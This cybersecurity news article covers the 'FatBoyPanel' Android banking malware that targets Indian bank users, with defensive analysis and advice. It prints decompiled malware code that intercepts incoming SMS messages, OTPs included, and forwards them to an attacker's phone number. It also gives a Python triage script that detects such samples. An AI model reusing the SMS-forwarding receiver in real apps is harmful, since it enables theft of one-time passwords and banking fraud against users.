New Malware Attacking Users of Indian Banks To Steal Aadhar, PAN, ATM & Credit Card PINs

A recent cybersecurity threat has emerged in India, targeting users of various Indian banks with a sophisticated malware campaign.

This campaign, discovered by the zLabs research team, involves nearly 900 malware samples designed to steal sensitive financial and personal data, including Aadhar numbers, PAN cards, ATM PINs, and credit card details.

The researchers have dubbed the campaign “FatBoyPanel.”


Security analysts at Zimperium noted that all the malware samples were designed to deceive Android users and steal their sensitive financial and personal information.

Modus Operandi

The malware is distributed through WhatsApp as APK files masquerading as legitimate government or banking applications.

Once installed, these apps deceive users into disclosing sensitive information by mimicking the user interface of real banking apps.

Admin dashboard view of the C&C servers (Source – Zimperium)

The malware exploits SMS permissions to intercept and exfiltrate messages, including one-time passwords (OTPs), facilitating unauthorized transactions.

This banker malware family has three distinct variants:-

  1. SMS Forwarding: Captures and forwards stolen SMS messages to an attacker-controlled phone number.
  2. Firebase-Exfiltration: Exfiltrates stolen SMS messages to a Firebase endpoint, which acts as a command-and-control server.
  3. Hybrid: Combines both techniques, forwarding stolen SMS messages to a phone number and a Firebase endpoint.

Code snippet allowing the Banker sample to read the received SMS (Source – Zimperium)

A key component of the malware is its ability to intercept SMS messages. Here’s an example of how it captures and forwards SMS messages:-

// Decompiled receiver from the sample: it registers for SMS_RECEIVED and forwards every incoming
// message body to a hard-coded attacker number (the "SMS Forwarding" variant).
public class ReceiveSms extends BroadcastReceiver {
    String androidID;
    private String stringNumber;
    public ReceiveSms() {
        this.androidID = "'";
        this.stringNumber = "+919229736554"; // attacker-controlled destination number
    }
    @Override // android.content.BroadcastReceiver
    public void onReceive(Context context0, Intent intent0) {
        // Device identifier collected so the operator can tie forwarded messages to a victim
        this.androidID = Settings.Secure.getString(context0.getContentResolver(), "android_id");
        if(intent0.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) {
            Bundle bundle0 = intent0.getExtras();
            if(bundle0 != null) {
                try {
                    // Raw PDUs of the incoming SMS, decoded one by one
                    Object[] arr_object = (Object[])bundle0.get("pdus");
                    SmsMessage[] arr_smsMessage = new SmsMessage[arr_object.length];
                    for(int v = 0; v < arr_object.length; ++v) {
                        SmsMessage smsMessage0 = SmsMessage.createFromPdu(((byte[])arr_object[v]));
                        arr_smsMessage[v] = smsMessage0;
                        smsMessage0.getOriginatingAddress();
                        String s = arr_smsMessage[v].getMessageBody();
                        // Exfiltration: the full message body (including any OTP) is sent onward by SMS
                        SmsManager.getDefault().sendTextMessage(this.stringNumber, null, s, null, null);
                    }
                } catch(Exception exception0) {
                    exception0.printStackTrace();
                }
            }
        }
    }
}
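The three variants above differ only in where the stolen SMS goes, so a triage script can sort samples by combining manifest facts (an SMS_RECEIVED receiver plus RECEIVE_SMS and SEND_SMS permissions) with hard-coded destinations found in the binary's strings. The following is an added example for analysts, not Zimperium's tooling; the manifest, the phone number and the Firebase URL are constructed placeholders standing in for the output of an APK decoder and a strings extraction.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
# Hard-coded E.164 destination numbers, like the one in the decompiled receiver above.
PHONE_RE = re.compile(r"\+\d{10,15}")
# Firebase Realtime Database hostnames used as a drop point for stolen messages.
FIREBASE_RE = re.compile(r"https://[\w.-]+\.(?:firebaseio\.com|firebasedatabase\.app)")

# Constructed manifest and string table (placeholders, not values from a real sample).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.fakebank">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application>
    <receiver android:name=".ReceiveSms" android:exported="true">
      <intent-filter><action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""
SAMPLE_STRINGS = ["+911234567890", "https://placeholder-project.firebaseio.com/sms.json"]


def manifest_facts(manifest_xml):
    """Return declared permissions and whether any receiver listens for SMS_RECEIVED."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    sms_receiver = any(
        action.get(ANDROID_NS + "name") == SMS_RECEIVED
        for receiver in root.iter("receiver")
        for action in receiver.iter("action")
    )
    return {"perms": perms, "sms_receiver": sms_receiver}


def classify(manifest_xml, strings):
    """Map a sample onto the three variants described in the report."""
    facts = manifest_facts(manifest_xml)
    if not (facts["sms_receiver"] and "android.permission.RECEIVE_SMS" in facts["perms"]):
        return "no-sms-interception"
    forwards = ("android.permission.SEND_SMS" in facts["perms"]
                and any(PHONE_RE.search(s) for s in strings))
    firebase = any(FIREBASE_RE.search(s) for s in strings)
    if forwards and firebase:
        return "hybrid"
    if forwards:
        return "sms-forwarding"
    if firebase:
        return "firebase-exfiltration"
    return "sms-interception-unclassified"
```

A sample that intercepts SMS but matches neither destination pattern is still flagged, since an SMS_RECEIVED receiver in a supposed banking app is itself the detection-worthy fact.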

Main banks targeted in this campaign (Source – Zimperium)

The malware campaign has exposed sensitive data of approximately 50,000 users, including SMS messages from Indian banks, bank details, card details, and government-issued identification details.

Over 1,000 phone numbers used in this campaign have been identified, which will be shared with authorities to track the threat actors.

Distribution graphs (Source – Zimperium)

To protect against potential threats, users should verify app authenticity by only downloading banking apps from official app stores.

Make sure to enable multi-factor authentication (MFA) using measures like “OTPs” and “biometric authentication.”

Also remain cautious with links and attachments by avoiding suspicious ones or those from unknown sources.

Users must therefore remain vigilant and take proactive steps to safeguard their personal and financial data.

It is also crucial for both individuals and institutions to stay informed and adapt their security measures accordingly.


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.